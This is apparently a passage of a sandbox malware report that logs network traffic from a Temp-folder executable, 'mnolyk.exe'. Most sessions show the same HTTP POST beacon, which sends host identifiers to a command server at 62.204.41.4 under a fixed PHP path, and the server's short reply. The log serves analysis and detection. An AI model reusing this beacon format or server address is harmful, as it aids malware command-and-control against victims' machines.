                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    130192.168.2.34983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:51.751305103 CET331OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.814352036 CET331INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    131192.168.2.34983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:51.983787060 CET332OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.050180912 CET332INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    132192.168.2.34983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:52.577364922 CET333OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.640379906 CET333INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    133192.168.2.34983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:52.859570980 CET334OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:52.922553062 CET334INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    134192.168.2.34983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:53.163923025 CET335OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:53.229603052 CET335INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    135192.168.2.34983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:54.069031000 CET336OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:54.132919073 CET336INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    136192.168.2.34983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:54.373775959 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:54.438036919 CET337INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    137192.168.2.34983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:55.963336945 CET338OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.031137943 CET338INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    138192.168.2.34984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:56.252732038 CET339OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.321096897 CET339INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    139192.168.2.34984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:56.501983881 CET340OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.567166090 CET340INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    14192.168.2.34971562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:13.538250923 CET214OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:13.601097107 CET215INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    140192.168.2.34984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:56.777808905 CET341OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:56.840537071 CET341INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    141192.168.2.34984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:57.016438007 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.083431959 CET342INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    142192.168.2.34984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:57.262975931 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.326699972 CET343INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    143192.168.2.34984562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:57.496565104 CET344OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.558598042 CET344INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    144192.168.2.34984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:57.735833883 CET345OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:57.798593044 CET345INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    145192.168.2.34984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:57.967039108 CET346OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.030903101 CET346INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    146192.168.2.34984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:58.209736109 CET347OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.275710106 CET347INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    147192.168.2.34984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:58.454915047 CET348OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.518615007 CET348INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    148192.168.2.34985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:58.686515093 CET349OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:58.752574921 CET349INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
